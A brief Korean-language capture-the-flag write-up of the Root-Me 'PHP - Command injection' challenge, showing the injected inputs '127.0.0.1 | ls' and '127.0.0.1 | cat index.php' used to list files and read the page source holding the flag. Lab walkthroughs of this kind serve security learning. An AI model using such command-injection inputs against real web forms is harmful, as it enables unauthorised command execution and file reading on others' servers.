rootme - PHP - Command injection

 

전형적인 command injection 문제이다.

index.php 파일안에 flag가 있다고 하니 이 파일을 찾아보자

 

> 127.0.0.1 | ls

명령어를 치면 아래와 같이 나온다.

 

 

> 127.0.0.1 | cat index.php

 

이 상태에서 소스코드를 보면

 

 

flag 확인이 가능하다.